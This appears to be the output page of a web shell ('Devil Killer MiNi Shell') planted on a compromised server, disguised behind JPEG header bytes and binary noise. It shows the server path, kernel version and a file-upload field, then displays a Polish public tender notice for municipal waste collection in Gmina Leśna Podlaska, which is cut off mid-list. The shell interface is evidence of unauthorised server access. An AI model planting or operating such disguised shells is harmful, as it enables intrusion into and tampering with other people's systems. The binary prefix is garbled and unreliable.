JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241127/0061926601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór i zagospodarowanie odpadów komunalnych z terenu nieruchomości zamieszkałych położonych na terenie Gminy Leśna Podlaska w 2025 r.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LEŚNA PODLASKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 030237598</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bialska 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Leśna Podlaska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-542</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL811 - Bialski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">833450720</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@lesnapodlaska.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">lesnapodlaska.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór i zagospodarowanie odpadów komunalnych z terenu nieruchomości zamieszkałych położonych na terenie Gminy Leśna Podlaska w 2025 r.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-382ba071-df46-4f45-b47d-2011222f113e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00619266</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00021727/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Odbiór i zagospodarowanie odpadów komunalnych z terenu nieruchomości zamieszkałych położonych na terenie Gminy Leśna Podlaska w 2025 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-382ba071-df46-4f45-b47d-2011222f113e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>srodowisko@lesnapodlaska.pl (nie dotyczy składania ofert w postępowaniu).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy<br/>e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu oraz informacje zamieszczone w zakładce „Centrum Pomocy”<br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania do Platformy eZamówienia.<br/>Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej<br/>w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie.<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie eZamówienia. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne<br/>są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje<br/>dotyczące specyfikacji połączenia określa § 12 Regulaminu Platformy e-Zamówienia, a mianowicie:<br/>W celu prawidłowego korzystania z usług Platformy e-Zamówienia wymagany jest:<br/>a) Komputer PC:<br/>− parametry minimum: Intel Core2 Duo, 2 GB RAM, HD,<br/>− zainstalowany jedne z poniższych systemów operacyjnych: MS Windows<br/>7 lub nowszy, OSX/Mac OS 10.10, Ubuntu 14.04,<br/>− zainstalowana jedna z poniższych przeglądarek: Chrome 66.0 lub nowsza, Firefox 59.0 lub nowszy, Safari 11.1 lub nowsza, Edge<br/>14.0 i nowsze,<br/>Lub<br/>b) Tablet/Telefon:<br/>− parametry minimum: 4 rdzenie procesora, 2GB RAM, Android 6.0<br/>Marshmallow, iOS 10.3,<br/>− przeglądarka Chrome 61 lub nowa<br/>11.14.2.Dla skorzystania z pełnej funkcjonalności może być konieczne włączenie<br/>w przeglądarce obsługi protokołu bezpiecznej transmisji danych SSL, obsługi Java Script, oraz cookies;<br/>Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania<br/>i oznaczania czasu odbioru danych:<br/>a) specyfikacja połączenia – formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>b) format danych oraz kodowanie: formularze dostępne są w formacie HTML z kodowaniem UTF-8,<br/>c) oznaczenia czasu odbioru danych: wszelkie operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do<br/>sekundy. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>Z uwagi na ograniczoną ilość znaków, pozostałe wymagania opisane zostały w Rozdziale 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego na zadanie pn.: „Budowa oraz przebudowa dróg gminnych na terenie Gminy Leśna Podlaska”<br/>prowadzonym w trybie podstawowym;<br/>3) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z późn.<br/>zm.), dalej „ustawa Pzp”;<br/>4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność.<br/>5) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>7) Wykonawca posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza<br/>integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego<br/>danych osobowych narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa<br/>w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą. Wystąpienie z żądaniem, o którym mowa w art. 18 ust.<br/>1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego lub konkursu. W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie<br/>Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania<br/>skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.10.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych z terenu nieruchomości zamieszkałych położonych na terenie Gminy Leśna Podlaska.<br/>4.2.	Zakres przedmiotu zamówienia obejmuje odbiór, transport i zagospodarowanie (zgodnie z hierarchią postępowania z odpadami) odpadów komunalnych w sposób zapewniający osiągnięcie odpowiednich poziomów przygotowania i recyklingu odpadów komunalnych oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2024 r. poz. 399), oraz aktualnie obowiązującymi aktami wykonawczymi do powyższej ustawy, zapisami „Planu gospodarki odpadami dla województwa lubelskiego 2022”, przyjętego uchwałą Sejmiku Województwa Lubelskiego, Nr XXIV/349/2016 z dnia 2 grudnia 2016 roku w sprawie uchwalenia „Planu gospodarki odpadami dla województwa Lubelskiego 2022” oraz obowiązującym w czasie trwania umowy Regulaminu utrzymania czystości i porządku na terenie Gminy Leśna Podlaska, a w szczególności:<br/>1)	odbiór, transport i zagospodarowanie odpadów komunalnych bez względu na występujące warunki atmosferyczne z każdego miejsca z nieruchomości zamieszkałych położonych na terenie gminy Leśna Podlaska;<br/>2)	odbiór, transport i zagospodarowanie wskazanych przez Zamawiającego odpadów komunalnych dostarczanych przez mieszkańców gminy Leśna Podlaska do Punktu Selektywnej Zbiorki Odpadów Komunalnych (zwanym dalej PSZOK) w dniu jego otwarcia. <br/>3)	zaopatrywanie nieruchomości w worki do odbioru odpadów;<br/>4)	odbiór i zagospodarowanie odpadów z dzikich wysypisk odpadów (w przypadku zaistnienia potrzeby);<br/>4.3.	Rodzaj i częstotliwość odbioru odpadów komunalnych<br/>4.3.1.	Rodzaje odpadów odbieranych z nieruchomości zamieszkałych:<br/>a)	papieru i tektury,<br/>b)	metali i tworzyw sztucznych, w tym opakowania wielomateriałowe,<br/>c)	szkła,<br/>d)	bioodpadów (odpady kuchenne),<br/>e)	odpadów zielonych (stanowiących części roślin pochodzących z pielęgnacji terenów zielonych i ogrodów),<br/>f)	popiołu z palenisk domowych,<br/>g)	odpadów pozostałych po segregacji.<br/>4.3.2.	Rodzaje odpadów z Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK) inne odpady komunalne selektywnie zbierane:<br/>a)	chemikalia (farby, lakiery, impregnaty, rozpuszczalniki itp.) oraz opakowania po nich<br/>b)	meble i inne odpady wielkogabarytowe,<br/>c)	zużyty sprzęt elektryczny i elektroniczny,<br/>d)	zużyte opony od samochodów osobowych (4 sztuki),<br/>e)	tekstylia i odzież,<br/>f)	odpady budowlane i rozbiórkowe.<br/>4.3.3.	Na terenie zabudowy jednorodzinnej, zagrodowej obowiązywać będzie system mieszany workowo – pojemnikowy zbiórki odpadów komunalnych. <br/>4.3.3.1.	Częstotliwość odbioru odpadów na obszarach o zabudowie jednorodzinnej:<br/>a)	bioodpady (odpady kuchenne) –w miesiącach od maja do września co dwa tygodnie, w pozostałym okresie raz w miesiącu;<br/>b)	odpady zielone (stanowiące części roślin pochodzących z pielęgnacji terenów zielonych i ogrodów) – co dwa tygodnie w okresie kwiecień- październik, 1 raz w listopadzie<br/>c)	papier i tektura – raz na kwartał,<br/>d)	tworzywa sztuczne i wielomateriałowe i metal– raz w miesiącu,<br/>e)	szkło - raz na kwartał,<br/>f)	popiół – w miesiącach od października do maja raz miesiącu i w miesiącu sierpniu,<br/>g)	odpady pozostałe po segregacji – w miesiącach od maja do września co dwa tygodnie, w pozostałym okresie raz w miesiącu.<br/>4.3.4. Na terenie zabudowy wielorodzinnej obowiązywać będzie system pojemnikowy.<br/>4.3.4.1.	Częstotliwość odbioru odpadów na obszarze o zabudowie wielorodzinnej:<br/>a)	bioodpady (odpady kuchenne) –co tydzień,<br/>b)	papier i tektura – raz na kwartał,<br/>c)	tworzywa sztuczne i wielomateriałowe i metal– raz w miesiącu,<br/>d)	szkło - raz na kwartał,<br/>e)	popiół – w miesiącach od października do maja raz miesiącu i w miesiącu sierpniu<br/>f)	odpady pozostałe po segregacji – co tydzień.<br/>4.3.5.	W Punkcie Selektywnego Zbierania Odpadów Komunalnych w Leśnej Podlaskiej (PSZOK) będą przyjmowane nieodpłatnie następujące grupy odpadów, dostarczonych do punktu własnym kosztem i staraniem właścicieli nieruchomości: <br/>a)	chemikalia (farby, lakiery, impregnaty, rozpuszczalniki itp.) oraz opakowania po nich, <br/>b)	meble i odpady wielkogabarytowe (bez względu na ilość materiałów, z których są zbudowane), <br/>c)	zużyty sprzęt elektryczny i elektroniczny, <br/>d)	zużyte opony z samochodów osobowych, <br/>e)	odpady budowlane i rozbiórkowe (z remontów i rozbiórek nie wymagających pozwoleń na budowę i rozbiórkę, z wyjątkiem materiałów zawierających azbest), <br/>f)	pozostałe nie wymienione (żarówki itp.)<br/>g)	tekstylia. <br/>Wszystkie powyższe rodzaje odpadów przyjmowane są w ilościach faktycznie powstałych w gospodarstwach domowych, nie wskazujących na ich przemysłowy, usługowy oraz produkcyjny charakter. <br/>PSZOK będzie funkcjonował w okresie obowiązywania umowy w terminach uzgodnionych z wykonawcą. Wykonawca dbać będzie o czystość i porządek na terenie PSZOK w Leśnej Podlaskiej oraz na terenie bezpośrednio przyległym, a zebrane odpady winne być na bieżąco przekazywane do Regionalnej Instalacji Przetworzenia Odpadów Komunalnych w Białej Podlaskiej, uprawnionemu przedsiębiorcy do recyklingu lub zagospodarowane we własnym zakresie. <br/>4.3.6.	Przeterminowane i zbędne leki gromadzone będą w specjalnych pojemnikach w Aptece w Leśnej Podlaskiej, po czym odbierane będą przez Wykonawcę w terminach uzgodnionych z właścicielem Apteki.<br/>4.4.	Wykaz urządzeń do gromadzenia odpadów i sprzętu technicznego<br/>4.4.1.	Urządzenia do gromadzeni odpadów to pojemniki o pojemności od 60 l do 1100 l lub worki foliowe o pojemności 60-240 l odpowiednio dla: <br/>a)	papieru - kolor niebieski z napisem &#34;Papier&#34;;<br/>b)	metali i tworzyw sztucznych oraz odpadów wielomateriałowych - kolor żółty z napisem &#34;Metale i tworzywa sztuczne&#34;;<br/>c)	szkła - kolor zielony z napisem &#34;Szkło&#34;;<br/>d)	bioodpadów (odpadów kuchennych) i odpadów zielonych – kolor brązowy,<br/>e)	popiół – kolor szary, <br/>f)	odpadów pozostałe po segregacji - kolor czarny;<br/>4.4.2.	Charakterystyka worków z folii HDPE do zbiórki odpadów dostarczanych przez Wykonawcę :<br/>1)	120 l w kolorze niebieskim na papier– (grubość folii - 0,02 mm),<br/>2)	120 l w kolorze zielonym na szkło – (grubość folii - 0,06 mm),<br/>3)	120 l w kolorze żółtym na tworzywa sztuczne - (grubość folii - 0,02 mm)<br/>4)	120 l w kolorze szarym na popiół – (grubość folii - 0,06 mm),<br/>5)	120 l w kolorze brązowym na odpady zielone – (grubość folii - 0,06 mm).<br/>Worki powinny być opatrzone nadrukiem na jaki rodzaj odpadu są przeznaczone oraz muszą posiadać adres i dane kontaktowe Wykonawcy. <br/>4.4.3.	Sprzęt do odbioru odpadów<br/>4.4.3.1.	Wykonawca winien dysponować sprzętem specjalistycznym do odbioru i transportu odpadów przez cały okres obowiązywania umowy tj. co najmniej:<br/>a)	dwoma pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych przystosowanych do odbioru pojemników 60 - 1100 l;<br/>b)	dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych przystosowanych do odbioru pojemników 60 - 1100 l;<br/>c)	jednym pojazdem do odbierania odpadów bez funkcji kompaktującej (z dźwignikiem hakowym lub bramowym do odbioru kontenerów KP-5 , KP-7 z odpadami).<br/>Pojazdy powinny: być trwale i czytelnie oznakowane, w widocznym miejscu nazwą firmy oraz danymi adresowymi i nr telefonu podmiotu odbierającego odpady.<br/>4.4.3.2.	Pojazdy winny spełniać wymagania zgodne z rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013 r. poz. 122).<br/>4.5.	Szczegółowe dane charakteryzujące zamówienie<br/>4.5.1.	Powierzchnia gminy – 97,69 km2<br/>4.5.2.	Liczba nieruchomości objętych zamówieniem wynosi 1150, w tym 8 budynków zabudowy wielorodzinnej i wielolokalowej.<br/>Liczba nieruchomości może ulec zmianie w okresie realizacji umowy co nie wpływa na wysokość wynagrodzenia Wykonawcy.<br/>4.5.3. Szacunkowa ilość odpadów przewidzianych do odbioru, transportu i zagospodarowania w ciągu 12 miesięcy wynosi łącznie ok. 753,51 Mg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90513100-7 - 